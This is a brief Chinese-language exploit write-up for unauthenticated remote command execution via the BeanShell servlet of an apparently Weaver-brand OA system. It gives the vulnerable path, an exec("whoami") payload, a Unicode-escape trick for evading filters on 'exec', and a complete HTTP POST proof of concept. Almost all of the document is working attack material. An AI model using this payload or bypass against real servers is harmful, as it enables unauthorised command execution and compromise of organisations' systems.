0x01 访问未授权访问页面
http://oa.xxxx.com/weaver/bsh.servlet.BshServlet
0x02 输入payload
exec("whoami");
输入命令执行函数,传入cmd命令,查看回显是否成功执行
0x03 将exec进行Unicode编码绕过部分站点exec过滤
\u0065\u0078\u0065\u0063("whoami");
POC:
POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 30 Connection: close Cookie: JSESSIONID=abca1it_jdsz2a73pnH1w; testBanCookie=test Upgrade-Insecure-Requests: 1 bsh.script=ex\u0065c("whoami")